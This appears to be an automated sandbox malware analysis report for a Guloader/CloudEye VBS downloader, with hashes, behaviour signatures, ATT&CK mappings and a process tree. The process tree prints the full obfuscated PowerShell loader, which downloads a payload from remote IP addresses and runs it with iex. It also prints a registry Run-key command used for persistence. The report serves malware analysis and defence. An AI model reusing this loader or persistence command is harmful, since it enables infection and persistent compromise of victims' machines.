Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    26-06-2024 03:07

General

  • Target

    9362977cfd09e8e32bd857225fd08aeae9f8dd75a241bc63e454c762c5a480ce.vbs

  • Size

    187KB

  • MD5

    c94c793ce09afaf08a2a3f90f91d447e

  • SHA1

    1cc82e99bd159f2360ae3e56ede43a14e81073a2

  • SHA256

    9362977cfd09e8e32bd857225fd08aeae9f8dd75a241bc63e454c762c5a480ce

  • SHA512

    d89fdc8efceacc857336b23896487259d33a9539b0f79077482a97017c3413da13b4a795f1bedbdd118b6ed089b839beae7d122c95884eb5b02b24585168b0d3

  • SSDEEP

    3072:vmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZZ:v08GxbKja3+DCbKCvBB/WnHXC/sLJFJG

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9362977cfd09e8e32bd857225fd08aeae9f8dd75a241bc63e454c762c5a480ce.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Baglygtes Apositia147 stolthed Nuculania Bantamvgtsbokserne Tjenesteydelses Syringomyelic Tua Intergenerative Basisuddannelses Togae Nomotheism Suffixer Skanderedes Purportedly Ampulliform Seksuelt174 Infraclavicle Rumstation Cesaro Blyantstregernes40 Monoton Bogbinderiers Bragedes Baglygtes Apositia147 stolthed Nuculania Bantamvgtsbokserne Tjenesteydelses Syringomyelic Tua Intergenerative Basisuddannelses Togae Nomotheism Suffixer Skanderedes Purportedly Ampulliform Seksuelt174 Infraclavicle Rumstation Cesaro Blyantstregernes40 Monoton Bogbinderiers Bragedes';$Ansgningerne = 1;Function Kompromitterendes($Skelligartede){$Dekreters=$Skelligartede.Length-$Ansgningerne;$Sandpits='SUBSTRIN';$Sandpits+='G';For( $Arbejdsmssig=1;$Arbejdsmssig -lt $Dekreters;$Arbejdsmssig+=2){$Baglygtes+=$Skelligartede.$Sandpits.Invoke( $Arbejdsmssig, $Ansgningerne);}$Baglygtes;}function Hekseskud($Peliosis){ & ($gennemarbejdes) ($Peliosis);}$Ungamboled=Kompromitterendes 'IMWo zDi lVlPad/F5 .N0N N(jWfiFnGdAoPw,sI N.TO 1A0,. 0 ; W iUn.6.4B;l xB6F4B; ,r v.:r1F2D1...0D)F .Gwe c kDoM/S2 0 1 0E0L1,0 1C HF i rBe.f o x /,1T2,1D. 0R ';$Kardan=Kompromitterendes 'SU s.e r -CA g eFnLt. ';$Bantamvgtsbokserne=Kompromitterendes '.h tHt pa: /C/B1G9 4l..5,9s. 3 1 .F1,3D7S/Sk y sA.DsVnFpM> hLtFtTpT:V/S/E9H4 . 1O5 6U. 8..,8.8./Uk y.s .Ss.nBpI ';$Vader=Kompromitterendes 'B> ';$gennemarbejdes=Kompromitterendes ' i.eBx ';$Echinococcosis='Tua';$Kloakerende = Kompromitterendes 'SeBc h oU ,% aKpKp dTa t.a % \,TEr.o.sUfUrVi h e.d.eLnI. UTnGdS S&,& IeAcChBot t ';Hekseskud (Kompromitterendes '.$CgWlToPbMaAl :EF o,rem.i cAa,rOoUiCdM=.(Ic m d / cN S$GK l o aRkee rUe.nmd.eT). ');Hekseskud (Kompromitterendes 'H$ g,lVo bPa lV:TN u cAu lCaFnPi,a =S$ B a.nNtMa mUv g t s.bToKk,s e,r,nLeS.Rs p,lSiPt (t$KVSaUd.e r )N ');Hekseskud (Kompromitterendes ' [ NRe tO. Sde r v iTcSe P,oFiUnUtSMKa,nkaTg,e r.] :F: SSe,c.u,rAi tUyEP r.o tRoocDo l =P U[DN.e.t . SSe.c uPrDi t y PVrSo tBo c o lCT ybp,eS]A:E:.TtlFs 1H2W ');$Bantamvgtsbokserne=$Nuculania[0];$Contempts= (Kompromitterendes ' $ g lBoHb a.l,:.SSwKo.r,dDfUiIs h eLs = N e,w - O bGj e c,tO SS.ySsBt e.mS.BNUe.t . W e bIC l,i,e.n t');$Contempts+=$Formicaroid[1];Hekseskud ($Contempts);Hekseskud (Kompromitterendes ' $cS wsomrBd f i,s.h,e,sL.AHae aFdUeAr s [.$IKFa rSd,a.n,]A=S$SUDnEgVa m.bAo.lGeOd ');$Reddendum=Kompromitterendes ' $FSZw.oWrId,fDiKs hKe s . D o w nVl.oOaAdHFTi l,eT(.$ BRa n tTaMmBv gBtVsCb oMkRsSeUr nCeN,A$vM o,nfo tFo nG) ';$Monoton=$Formicaroid[0];Hekseskud (Kompromitterendes 'P$,g l oAbNa,l :.STe lStSe r =S(ST.e s,tB- PEaHtphF ,$ MBo.n o,tOo nS) ');while (!$Selter) {Hekseskud (Kompromitterendes 'h$CgDlao,bAa.l :HH eApJt a.c.oFlSiLc.=r$ t rLuEe ') ;Hekseskud $Reddendum;Hekseskud (Kompromitterendes '.SDtSa.r t -US l,eLe pg C4R ');Hekseskud (Kompromitterendes '.$Ag,l,oCb a lM:FSEeHl t.eLrI=S(PT eFsRtB- PRa.t hL $AMRo,nMoCtEo.n )u ') ;Hekseskud (Kompromitterendes ' $ g.l oAb,aSl,:,s tAo lOt h e d,=M$ gnl,oPb awlS:WA,pRo,s.iAtHiTa.1T4k7e+ +,% $TN u cBuOl aMnBiGa . cGoDu n t, ') ;$Bantamvgtsbokserne=$Nuculania[$stolthed];}$Impulsing109=335650;$oppede=26343;Hekseskud (Kompromitterendes 'T$SgFlIoLbia l :PIPnPt eFr gIe,n e rIaNt.iDvBeH T=T FG eAth-.C o,n t e.n,tb I$.M.oAnEo,tSo nS ');Hekseskud (Kompromitterendes 'C$ gDl oRbYaBlA:CACnUh n,gUeNr eAs. A=C C[PSOy,s t e m .DC o.navBeErRtB]P:H: FDr,o mRB,aBsGeD6N4 S t,rSiCn g (E$.I nEt.e,rDg,e nUeMrsaTtPiavYe )C ');Hekseskud (Kompromitterendes ' $BgKl oLb.aUlS:AN,orm ost hSe.iTsPm S=R W[LS y.sItNe mK. TAe x,tf.LESnVcAo dCiBn.g ] : :SASS.CTI IB..GAeWtISMt r i,n g.(,$BAAn.hSn gTeSrOe s )U ');Hekseskud (Kompromitterendes ',$Ig laoSbraSlD:CC oMlToGrUipfNiBcs6D= $SN,oKm o.t hPeKi sUmO. s.ucb,s tIrsiAngg (B$.ITm.pSu,l,sNi,noge1 0M9,,B$UoMpSpDeAd e ) ');Hekseskud $Colorific6;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2728
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trosfriheden.Und && echo t"
        3⤵
          PID:2796
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Baglygtes Apositia147 stolthed Nuculania Bantamvgtsbokserne Tjenesteydelses Syringomyelic Tua Intergenerative Basisuddannelses Togae Nomotheism Suffixer Skanderedes Purportedly Ampulliform Seksuelt174 Infraclavicle Rumstation Cesaro Blyantstregernes40 Monoton Bogbinderiers Bragedes Baglygtes Apositia147 stolthed Nuculania Bantamvgtsbokserne Tjenesteydelses Syringomyelic Tua Intergenerative Basisuddannelses Togae Nomotheism Suffixer Skanderedes Purportedly Ampulliform Seksuelt174 Infraclavicle Rumstation Cesaro Blyantstregernes40 Monoton Bogbinderiers Bragedes';$Ansgningerne = 1;Function Kompromitterendes($Skelligartede){$Dekreters=$Skelligartede.Length-$Ansgningerne;$Sandpits='SUBSTRIN';$Sandpits+='G';For( $Arbejdsmssig=1;$Arbejdsmssig -lt $Dekreters;$Arbejdsmssig+=2){$Baglygtes+=$Skelligartede.$Sandpits.Invoke( $Arbejdsmssig, $Ansgningerne);}$Baglygtes;}function Hekseskud($Peliosis){ & ($gennemarbejdes) ($Peliosis);}$Ungamboled=Kompromitterendes 'IMWo zDi lVlPad/F5 .N0N N(jWfiFnGdAoPw,sI N.TO 1A0,. 0 ; W iUn.6.4B;l xB6F4B; ,r v.:r1F2D1...0D)F .Gwe c kDoM/S2 0 1 0E0L1,0 1C HF i rBe.f o x /,1T2,1D. 0R ';$Kardan=Kompromitterendes 'SU s.e r -CA g eFnLt. ';$Bantamvgtsbokserne=Kompromitterendes '.h tHt pa: /C/B1G9 4l..5,9s. 3 1 .F1,3D7S/Sk y sA.DsVnFpM> hLtFtTpT:V/S/E9H4 . 1O5 6U. 8..,8.8./Uk y.s .Ss.nBpI ';$Vader=Kompromitterendes 'B> ';$gennemarbejdes=Kompromitterendes ' i.eBx ';$Echinococcosis='Tua';$Kloakerende = Kompromitterendes 'SeBc h oU ,% aKpKp dTa t.a % \,TEr.o.sUfUrVi h e.d.eLnI. UTnGdS S&,& IeAcChBot t ';Hekseskud (Kompromitterendes '.$CgWlToPbMaAl :EF o,rem.i cAa,rOoUiCdM=.(Ic m d / cN S$GK l o aRkee rUe.nmd.eT). ');Hekseskud (Kompromitterendes 'H$ g,lVo bPa lV:TN u cAu lCaFnPi,a =S$ B a.nNtMa mUv g t s.bToKk,s e,r,nLeS.Rs p,lSiPt (t$KVSaUd.e r )N ');Hekseskud (Kompromitterendes ' [ NRe tO. Sde r v iTcSe P,oFiUnUtSMKa,nkaTg,e r.] :F: SSe,c.u,rAi tUyEP r.o tRoocDo l =P U[DN.e.t . SSe.c uPrDi t y PVrSo tBo c o lCT ybp,eS]A:E:.TtlFs 1H2W ');$Bantamvgtsbokserne=$Nuculania[0];$Contempts= (Kompromitterendes ' $ g lBoHb a.l,:.SSwKo.r,dDfUiIs h eLs = N e,w - O bGj e c,tO SS.ySsBt e.mS.BNUe.t . W e bIC l,i,e.n t');$Contempts+=$Formicaroid[1];Hekseskud ($Contempts);Hekseskud (Kompromitterendes ' $cS wsomrBd f i,s.h,e,sL.AHae aFdUeAr s [.$IKFa rSd,a.n,]A=S$SUDnEgVa m.bAo.lGeOd ');$Reddendum=Kompromitterendes ' $FSZw.oWrId,fDiKs hKe s . D o w nVl.oOaAdHFTi l,eT(.$ BRa n tTaMmBv gBtVsCb oMkRsSeUr nCeN,A$vM o,nfo tFo nG) ';$Monoton=$Formicaroid[0];Hekseskud (Kompromitterendes 'P$,g l oAbNa,l :.STe lStSe r =S(ST.e s,tB- PEaHtphF ,$ MBo.n o,tOo nS) ');while (!$Selter) {Hekseskud (Kompromitterendes 'h$CgDlao,bAa.l :HH eApJt a.c.oFlSiLc.=r$ t rLuEe ') ;Hekseskud $Reddendum;Hekseskud (Kompromitterendes '.SDtSa.r t -US l,eLe pg C4R ');Hekseskud (Kompromitterendes '.$Ag,l,oCb a lM:FSEeHl t.eLrI=S(PT eFsRtB- PRa.t hL $AMRo,nMoCtEo.n )u ') ;Hekseskud (Kompromitterendes ' $ g.l oAb,aSl,:,s tAo lOt h e d,=M$ gnl,oPb awlS:WA,pRo,s.iAtHiTa.1T4k7e+ +,% $TN u cBuOl aMnBiGa . cGoDu n t, ') ;$Bantamvgtsbokserne=$Nuculania[$stolthed];}$Impulsing109=335650;$oppede=26343;Hekseskud (Kompromitterendes 'T$SgFlIoLbia l :PIPnPt eFr gIe,n e rIaNt.iDvBeH T=T FG eAth-.C o,n t e.n,tb I$.M.oAnEo,tSo nS ');Hekseskud (Kompromitterendes 'C$ gDl oRbYaBlA:CACnUh n,gUeNr eAs. A=C C[PSOy,s t e m .DC o.navBeErRtB]P:H: FDr,o mRB,aBsGeD6N4 S t,rSiCn g (E$.I nEt.e,rDg,e nUeMrsaTtPiavYe )C ');Hekseskud (Kompromitterendes ' $BgKl oLb.aUlS:AN,orm ost hSe.iTsPm S=R W[LS y.sItNe mK. TAe x,tf.LESnVcAo dCiBn.g ] : :SASS.CTI IB..GAeWtISMt r i,n g.(,$BAAn.hSn gTeSrOe s )U ');Hekseskud (Kompromitterendes ',$Ig laoSbraSlD:CC oMlToGrUipfNiBcs6D= $SN,oKm o.t hPeKi sUmO. s.ucb,s tIrsiAngg (B$.ITm.pSu,l,sNi,noge1 0M9,,B$UoMpSpDeAd e ) ');Hekseskud $Colorific6;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1792
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trosfriheden.Und && echo t"
            4⤵
              PID:1600
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of WriteProcessMemory
              PID:1860
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startskud" /t REG_EXPAND_SZ /d "%Pataca% -w 1 $Kommunikationshastigheden=(Get-ItemProperty -Path 'HKCU:\Lettelsen\').Fearable;%Pataca% ($Kommunikationshastigheden)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1504
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startskud" /t REG_EXPAND_SZ /d "%Pataca% -w 1 $Kommunikationshastigheden=(Get-ItemProperty -Path 'HKCU:\Lettelsen\').Fearable;%Pataca% ($Kommunikationshastigheden)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2056

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BDCVRDA6O0MOHSFBRKKT.temp
        Filesize

        7KB

        MD5

        523b0f56e01d5ba754bc749b5d5f771a

        SHA1

        d381bd2851c45314d4b7ce4c2f452cf5fca66a62

        SHA256

        9875b87d4aefa41d7cdf11ec638117326b9a974e0f043808987d531bb5cab71f

        SHA512

        cbc15c117102d4532e07e8d49cab0af3058656ea5ce3e79e63bce8523bbcf954fe06b5ef9b432d38ce022a67413ed87246c8007d6fbe3b88ee7983c63ecd723e

      • C:\Users\Admin\AppData\Roaming\Trosfriheden.Und
        Filesize

        471KB

        MD5

        f7e8bfbb1f03fe955a185a2f29517fa9

        SHA1

        5c9bcf4a10977388f474e6448ce9d4069fc16d13

        SHA256

        200c981909b9bd449214126389e9e8e52dc30ee233b30d6d2f8437898f03c0e7

        SHA512

        06436f8b41d1e277939e0375598da56336838f7c53ba91324de9caa2b0580318000e992dfb6646b1af6e5a7cc1558245d3c5feb6bc3f24740217e3dc670f0099

      • memory/1792-37-0x0000000006510000-0x000000000A7F1000-memory.dmp
        Filesize

        66.9MB

      • memory/1860-41-0x0000000001710000-0x00000000059F1000-memory.dmp
        Filesize

        66.9MB

      • memory/1860-38-0x00000000006A0000-0x0000000001702000-memory.dmp
        Filesize

        16.4MB

      • memory/2728-25-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
        Filesize

        9.6MB

      • memory/2728-27-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
        Filesize

        9.6MB

      • memory/2728-28-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
        Filesize

        9.6MB

      • memory/2728-29-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
        Filesize

        9.6MB

      • memory/2728-30-0x000007FEF571E000-0x000007FEF571F000-memory.dmp
        Filesize

        4KB

      • memory/2728-26-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
        Filesize

        9.6MB

      • memory/2728-21-0x000007FEF571E000-0x000007FEF571F000-memory.dmp
        Filesize

        4KB

      • memory/2728-24-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
        Filesize

        9.6MB

      • memory/2728-22-0x000000001B5D0000-0x000000001B8B2000-memory.dmp
        Filesize

        2.9MB

      • memory/2728-23-0x00000000022A0000-0x00000000022A8000-memory.dmp
        Filesize

        32KB

      • memory/2728-44-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp
        Filesize

        9.6MB